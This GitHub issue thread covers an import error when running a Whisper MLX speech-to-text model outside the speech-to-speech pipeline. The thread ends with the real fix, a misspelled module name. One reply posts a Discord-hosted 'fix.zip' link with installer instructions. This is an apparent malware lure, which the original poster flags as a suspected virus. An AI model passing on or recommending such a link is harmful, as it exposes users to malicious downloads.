### ISSUE TITLE
STT Error: Could not transcribe audio(numpy.array format) instantly

### ISSUE THREAD

**Issue by sxinyuhoo** [huggingface/speech-to-speech#70]
Hi! I have occurred a problem when i run the STT module separately, here is the detail:

In the STT module, there is `warm_up` function that creates a dummy_input to instantly input into the stt model:

```python
def warmup(self):
  logger.info(f"Warming up {self.__class__.__name__}")
  
  # 2 warmup steps for no compile or compile mode with CUDA graphs capture
  n_steps = 1
  dummy_input = np.array([0] * 512)
  
  for _ in range(n_steps):
  _ = self.model.transcribe(dummy_input)["text"].strip()
```

BUT when I run this model in the single script, ValueError has occurred,  my test code is:  

```python
import numpy as np
from lighting_whisper_mlx import LightingWhisperMLX

dummy_input = np.array([0] * 512)

stt_model = LightingWhisperMLX(model="distil-large-v3", batch_size=6, quant=None)
```

and Error is:

```shell
ValueError: [load_npz] Input must be a zip file or a file-like object that can be opened with zipfile.ZipFile
```

Do you have any ideas on this issue?

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by sxinyuhoo** [comment]
> try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer

🦠Suspected to be a virus，DO NOT CLICK AND UNZIP 
Please delete that comment @andimarafioti

**Comment by sxinyuhoo** [comment]
solved, replace the `from lighting_whisper_mlx import LightingWhisperMLX` to `from lightning_whisper_mlx import LightningWhisperMLX`
